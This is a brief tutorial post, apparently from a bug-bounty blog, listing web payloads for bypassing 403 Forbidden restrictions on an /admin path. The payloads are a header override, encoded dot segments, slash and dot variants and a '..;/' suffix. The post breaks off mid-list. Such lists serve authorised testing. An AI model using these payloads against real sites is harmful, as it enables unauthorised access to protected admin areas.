title: How I passed 403 author: Elsfa7-110 categories: [403, Tutorial] tags: [403] pin: true —
403 Forbidden Bypass
- Using “X-Original-URL” header
1 2
GET /admin HTTP/1.1 Host: target.com
Try this to bypass
1 2 3
GET /anything HTTP/1.1 Host: target.com X-Original-URL: /admin
- Appending %2e after the first slash
1
http://target.com/admin => 403
Try this to bypass
1
http://target.com/%2e/admin => 200
- Try add dot (.) and slash (/) in the URL
1
http://target.com/admin => 403
Try this to bypass
1 2 3
http://target.com/admin/. => 200 http://target.com//admin// => 200 http://target.com/./admin/./ => 200
- Add “..;/” after the directory name
1
http://target.com/admin
Try this to bypass
1
http://target.com/admin..;/
- Try to uppercase the alphabet in the url ```